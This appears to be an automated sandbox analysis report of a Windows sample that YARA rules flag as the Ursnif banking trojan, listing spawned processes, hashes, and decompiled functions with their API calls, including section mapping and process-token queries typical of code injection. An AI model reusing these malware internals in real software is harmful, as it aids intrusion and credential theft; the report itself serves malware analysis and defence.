
                                                                                                                                      General

                                                                                                                                      Start time:21:20:18
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6b2800000
                                                                                                                                      File size:625664 bytes
                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: csc.exe PID: 4908 Parent PID: 5556

                                                                                                                                      General

                                                                                                                                      Start time:21:20:24
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
                                                                                                                                      Imagebase:0x7ff7fbaa0000
                                                                                                                                      File size:2739304 bytes
                                                                                                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: cvtres.exe PID: 5016 Parent PID: 4908

                                                                                                                                      General

                                                                                                                                      Start time:21:20:25
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
                                                                                                                                      Imagebase:0x7ff617aa0000
                                                                                                                                      File size:47280 bytes
                                                                                                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: csc.exe PID: 3360 Parent PID: 5556

                                                                                                                                      General

                                                                                                                                      Start time:21:20:27
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
                                                                                                                                      Imagebase:0x7ff7fbaa0000
                                                                                                                                      File size:2739304 bytes
                                                                                                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: cvtres.exe PID: 6020 Parent PID: 3360

                                                                                                                                      General

                                                                                                                                      Start time:21:20:28
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
                                                                                                                                      Imagebase:0x7ff617aa0000
                                                                                                                                      File size:47280 bytes
                                                                                                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 5556

                                                                                                                                      General

                                                                                                                                      Start time:21:20:32
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:
                                                                                                                                      Imagebase:0x7ff714890000
                                                                                                                                      File size:3933184 bytes
                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: control.exe PID: 4672 Parent PID: 6780

                                                                                                                                      General

                                                                                                                                      Start time:21:20:37
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\control.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                      Imagebase:0x7ff657870000
                                                                                                                                      File size:117760 bytes
                                                                                                                                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                      Chronological Activities

                                                                                                                                      Analysis Process: RuntimeBroker.exe PID: 3668 Parent PID: 3388

                                                                                                                                      General

                                                                                                                                      Start time:21:20:44
                                                                                                                                      Start date:24/11/2020
                                                                                                                                      Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:
                                                                                                                                      Imagebase:0x7ff6883e0000
                                                                                                                                      File size:99272 bytes
                                                                                                                                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                      Chronological Activities

                                                                                                                                      Disassembly

                                                                                                                                      Code Analysis

                                                                                                                                      Reset < >

                                                                                                                                        Analysis Process: loaddll32.exe PID: 6780 Parent PID: 5700 loaddll32.exeCOMMON

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0044B868, Relevance: 51.1, APIs: 25, Strings: 4, Instructions: 317memorylibrarynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(0046E268), ref: 0044B886
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • memset.NTDLL ref: 0044B8B7
                                                                                                                                        • RtlInitializeCriticalSection.NTDLL(03BD8D20), ref: 0044B8C8
                                                                                                                                          • Part of subcall function 00442340: RtlInitializeCriticalSection.NTDLL(0046E240), ref: 00442364
                                                                                                                                          • Part of subcall function 00442340: RtlInitializeCriticalSection.NTDLL(0046E220), ref: 0044237A
                                                                                                                                          • Part of subcall function 00442340: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044238B
                                                                                                                                          • Part of subcall function 00442340: GetModuleHandleA.KERNEL32(0046F01D), ref: 004423B8
                                                                                                                                          • Part of subcall function 004617AA: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 004617C4
                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060), ref: 0044B8F1
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044B902
                                                                                                                                        • CloseHandle.KERNEL32(00000324), ref: 0044B916
                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,?), ref: 0044B95F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 0044B972
                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,?), ref: 0044B987
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0044B9B7
                                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0044B9CC
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044B9D6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0044B9E0
                                                                                                                                        • GetShellWindow.USER32 ref: 0044B9FB
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0044BA02
                                                                                                                                        • CreateEventA.KERNEL32(0046E0F8,00000001,00000000,00000000,61636F4C,00000001,?,?), ref: 0044BA91
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000018,61636F4C), ref: 0044BABB
                                                                                                                                        • OpenEventA.KERNEL32(00100000,00000000,03BD89B8), ref: 0044BAE3
                                                                                                                                        • CreateEventA.KERNEL32(0046E0F8,00000001,00000000,03BD89B8), ref: 0044BAF6
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044BAFC
                                                                                                                                        • GetLastError.KERNEL32(0044FC34,0046E04C,0046E050), ref: 0044BB82
                                                                                                                                        • LoadLibraryA.KERNEL32(ADVAPI32.DLL,0044FC34,0046E04C,0046E050), ref: 0044BB96
                                                                                                                                        • SetEvent.KERNEL32(?,0045D878,00000000,00000000), ref: 0044BC0F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000052,0045D878), ref: 0044BC24
                                                                                                                                        • wsprintfA.USER32 ref: 0044BC54
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemsetwsprintf
                                                                                                                                        • String ID: 0123456789ABCDEF$ADVAPI32.DLL$`F$`F
                                                                                                                                        • API String ID: 204107308-2135442455
                                                                                                                                        • Opcode ID: 0395e2f28e3d3d4217d74626e3886e97aeea3b8b18e08e230d07e32da626cd5d
                                                                                                                                        • Instruction ID: 809e5b2a8196a2894ef6b79846d897128b370ef5ed000fc730b653e0cad6a945
                                                                                                                                        • Opcode Fuzzy Hash: 0395e2f28e3d3d4217d74626e3886e97aeea3b8b18e08e230d07e32da626cd5d
                                                                                                                                        • Instruction Fuzzy Hash: BEB1B274A04304DFE7209F66DC85A2B7BE8EB44704B11492FF545D2251EBB8E849CBAF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 737513E4, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                        			E737513E4(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L73752250();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x73754150;
				_push(_t15 + 0x7375505e);
				_push(_t15 + 0x73755054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L7375224A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x73754140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                                                                                                                        0x737513e4
                                                                                                                                        0x737513ed
                                                                                                                                        0x737513f1
                                                                                                                                        0x737513f7
                                                                                                                                        0x737513fc
                                                                                                                                        0x73751401
                                                                                                                                        0x73751404
                                                                                                                                        0x73751407
                                                                                                                                        0x7375140c
                                                                                                                                        0x7375140d
                                                                                                                                        0x73751410
                                                                                                                                        0x7375141b
                                                                                                                                        0x73751422
                                                                                                                                        0x73751426
                                                                                                                                        0x73751428
                                                                                                                                        0x73751429
                                                                                                                                        0x7375142c
                                                                                                                                        0x73751431
                                                                                                                                        0x7375143b
                                                                                                                                        0x7375143d
                                                                                                                                        0x7375143d
                                                                                                                                        0x73751451
                                                                                                                                        0x73751457
                                                                                                                                        0x7375145b
                                                                                                                                        0x737514ab
                                                                                                                                        0x7375145d
                                                                                                                                        0x73751466
                                                                                                                                        0x7375147c
                                                                                                                                        0x73751484
                                                                                                                                        0x73751496
                                                                                                                                        0x7375149a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73751486
                                                                                                                                        0x73751489
                                                                                                                                        0x7375148e
                                                                                                                                        0x73751490
                                                                                                                                        0x73751490
                                                                                                                                        0x73751471
                                                                                                                                        0x73751473
                                                                                                                                        0x7375149c
                                                                                                                                        0x7375149d
                                                                                                                                        0x7375149d
                                                                                                                                        0x73751466
                                                                                                                                        0x737514b3

                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A,?), ref: 737513F1
                                                                                                                                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 73751407
                                                                                                                                        • _snwprintf.NTDLL ref: 7375142C
                                                                                                                                        • CreateFileMappingW.KERNELBASE(000000FF,73754140,00000004,00000000,?,?), ref: 73751451
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 73751468
                                                                                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 7375147C
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 73751494
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9), ref: 7375149D
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,737520D9,0000000A), ref: 737514A5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1724014008-0
                                                                                                                                        • Opcode ID: 0f0a6a9e98561662153bc0ee6589dbf21e2be8d3932bfe9359678ecbb824f57e
                                                                                                                                        • Instruction ID: f38045e591acce376ae0d1217e65f11278c7b7b525f4fea62009041199ccda01
                                                                                                                                        • Opcode Fuzzy Hash: 0f0a6a9e98561662153bc0ee6589dbf21e2be8d3932bfe9359678ecbb824f57e
                                                                                                                                        • Instruction Fuzzy Hash: 3821A4B7A00208BFDB19AFA5CC84F9E777AEB48252F214025F55AD7190D6355905CB60
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045DA66, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0046E0FC,00000000), ref: 0045DA94
                                                                                                                                        • StrRChrA.SHLWAPI(03BD85A8,00000000,0000005C,00000000,00000001,00000000,0046E0B4,00000000,?), ref: 0045DAA9
                                                                                                                                        • _strupr.NTDLL ref: 0045DABF
                                                                                                                                        • lstrlen.KERNEL32(03BD85A8), ref: 0045DAC7
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,0046E0B4,00000000,?), ref: 0045DB47
                                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000000,00461A1D), ref: 0045DB6E
                                                                                                                                        • GetLastError.KERNEL32(?), ref: 0045DB88
                                                                                                                                        • RtlRemoveVectoredExceptionHandler.NTDLL(00644280), ref: 0045DB9E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1098824789-0
                                                                                                                                        • Opcode ID: d0230fe1223668f11c9cfa31fd0df507a040fad6943fd9bf4c332853ec8c5695
                                                                                                                                        • Instruction ID: aa05572dd429cdb4c0776109d87c98cd4f12aef76585c04219c3e049fcde715d
                                                                                                                                        • Opcode Fuzzy Hash: d0230fe1223668f11c9cfa31fd0df507a040fad6943fd9bf4c332853ec8c5695
                                                                                                                                        • Instruction Fuzzy Hash: A631D975D00224AFE720AF7A9C8496F77E5AB04315B15053AE901D3292F6F95C4887AF
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045A3DE, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 0045A425
                                                                                                                                        • NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 0045A438
                                                                                                                                        • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0045A454
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 0045A471
                                                                                                                                        • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0045A47E
                                                                                                                                        • NtClose.NTDLL(00000001), ref: 0045A490
                                                                                                                                        • NtClose.NTDLL(00000000), ref: 0045A49A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2575439697-0
                                                                                                                                        • Opcode ID: fccf2e28b5a860de0f1dbd6a36a793c91360e5baa6ad529490a95aee4ed1e0e7
                                                                                                                                        • Instruction ID: 5171fd49ac7ec124286f19b6af922021b59fb05b5570a2d25e35db6ab37ec591
                                                                                                                                        • Opcode Fuzzy Hash: fccf2e28b5a860de0f1dbd6a36a793c91360e5baa6ad529490a95aee4ed1e0e7
                                                                                                                                        • Instruction Fuzzy Hash: 61215572900218BBDB01EF96CC45ADEBFBCFB08780F10416AF900E6120D7B58A54CBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00441D18, Relevance: 9.2, APIs: 6, Instructions: 234nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,00457ED5,00000800,?,?,00000000,74B05520), ref: 00441F5A
                                                                                                                                          • Part of subcall function 00442710: GetModuleHandleA.KERNEL32(4C44544E,00000020,00000000,00000000,?,?,?,?,00441E28,?,?,?,00000000,74B05520), ref: 00442735
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00442757
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0044276D
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00442783
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00442799
                                                                                                                                          • Part of subcall function 00442710: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 004427AF
                                                                                                                                          • Part of subcall function 0046345F: NtMapViewOfSection.NTDLL(00000000,000000FF,00456283,00000000,00000000,00456283,00000000,00000002,00000000,?,?,00000000,00456283,000000FF,00000000), ref: 0046348D
                                                                                                                                          • Part of subcall function 004462CC: memcpy.NTDLL(-00000004,00000004,?,00000000,?,?,?,?,?,?,?,00000000,74B05520), ref: 00446332
                                                                                                                                          • Part of subcall function 004462CC: memcpy.NTDLL(00000000,?,?), ref: 00446391
                                                                                                                                        • memcpy.NTDLL(004414F6,00000000,?,?,00000000,?,?,?,?,?,?,00000000,74B05520), ref: 00441E87
                                                                                                                                        • memcpy.NTDLL(?,00000000,00000018,?,00000000,?,?,?,?,?,?,00000000,74B05520), ref: 00441ED3
                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,74B05520), ref: 00441F98
                                                                                                                                        • NtClose.NTDLL(00000000,00000000,74B05520), ref: 00441FBF
                                                                                                                                        • memset.NTDLL ref: 00441FDA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProcmemcpy$SectionView$CloseHandleModuleUnmapmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4028138328-0
                                                                                                                                        • Opcode ID: 40380b94b5cb0a0039b6e71ecbe4d457454f2c1fa789176a41d2bc205f071259
                                                                                                                                        • Instruction ID: d26a5a6bc9e58de4ce24f991a7786cf3b1450464a1b036b151afdb26a45c52b1
                                                                                                                                        • Opcode Fuzzy Hash: 40380b94b5cb0a0039b6e71ecbe4d457454f2c1fa789176a41d2bc205f071259
                                                                                                                                        • Instruction Fuzzy Hash: 91916175E0060AEFDF10DF95C980AAEBBF4FF04304F10456AE805A7361D778AA85DB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044976D, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00449798
                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 004497A5
                                                                                                                                        • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00449831
                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0044983C
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00449845
                                                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0044985A
                                                                                                                                          • Part of subcall function 00458584: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,004497D3,?), ref: 0045858C
                                                                                                                                          • Part of subcall function 00458584: GetVersion.KERNEL32 ref: 0045859B
                                                                                                                                          • Part of subcall function 00458584: GetCurrentProcessId.KERNEL32 ref: 004585AA
                                                                                                                                          • Part of subcall function 00458584: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 004585C7
                                                                                                                                          • Part of subcall function 00444823: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00444875
                                                                                                                                          • Part of subcall function 00444823: memcpy.NTDLL(?,?,?,?,?,?), ref: 00444904
                                                                                                                                          • Part of subcall function 00444823: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 0044491F
                                                                                                                                          • Part of subcall function 004649E9: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0044EDBE), ref: 00464A0F
                                                                                                                                          • Part of subcall function 004450BE: OpenProcess.KERNEL32(00000400,00000000,0045840E,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450D9
                                                                                                                                          • Part of subcall function 004450BE: IsWow64Process.KERNEL32(00000000,00000000,0046E088,?,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450EA
                                                                                                                                          • Part of subcall function 004450BE: FindCloseChangeNotification.KERNELBASE(00000000,?,?,0045840E,00000000,0046E088,?,00000000), ref: 004450FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CreateFileModuleOpenThreadTimeVirtual$AllocChangeCloseCurrentEventExitFindFreeHandleHeaderHeapImageInformationNameNotificationQuerySystemUserVersionWow64memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1973333951-0
                                                                                                                                        • Opcode ID: 99beeecffebd8d466ba2134cab138459088e173c70e85b4971d5f94770e3c5f1
                                                                                                                                        • Instruction ID: 52708ad5d67f04504d600ebd2d7d4c46a325d3e604a97bd8a676fdec3abeac23
                                                                                                                                        • Opcode Fuzzy Hash: 99beeecffebd8d466ba2134cab138459088e173c70e85b4971d5f94770e3c5f1
                                                                                                                                        • Instruction Fuzzy Hash: 2F310535A00118EFEB21EF79DC85A6F77B8EB41744B10453AE501EB211EBB88D00DB9A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00461813, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29memorynativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL([uE,00000000,00000000,[uE,00003000,00000040,?,?,?,0045755B), ref: 00461844
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(00000000), ref: 0046184B
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,0045755B), ref: 00461852
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$AllocateLastMemoryStatusVirtual
                                                                                                                                        • String ID: [uE$[uE
                                                                                                                                        • API String ID: 722216270-1812326636
                                                                                                                                        • Opcode ID: e42e6ca9023417a33f769f6ac14efffa1655f147ec5398583f572d96b3ced444
                                                                                                                                        • Instruction ID: b40c97280bddd0fae74faae04d22f2a10ffc4a5b42805f2c99f5b3394e3d3cba
                                                                                                                                        • Opcode Fuzzy Hash: e42e6ca9023417a33f769f6ac14efffa1655f147ec5398583f572d96b3ced444
                                                                                                                                        • Instruction Fuzzy Hash: 54F05E71910309FBEB05DB94DD19BDE77BCEB04309F100058E201A6080EBB8AB04CB69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045620F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000), ref: 0045626C
                                                                                                                                          • Part of subcall function 0046345F: NtMapViewOfSection.NTDLL(00000000,000000FF,00456283,00000000,00000000,00456283,00000000,00000002,00000000,?,?,00000000,00456283,000000FF,00000000), ref: 0046348D
                                                                                                                                        • memset.NTDLL ref: 00456290
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateViewmemset
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 2533685722-2766056989
                                                                                                                                        • Opcode ID: 672d55a76be78c931a36429570adf0dda9075a73d5d6f688c06625c2393fd433
                                                                                                                                        • Instruction ID: 5a3ac7ffcfad486a80420f9d295f37459ab3c7f76a68993a2b91fff0e83e949b
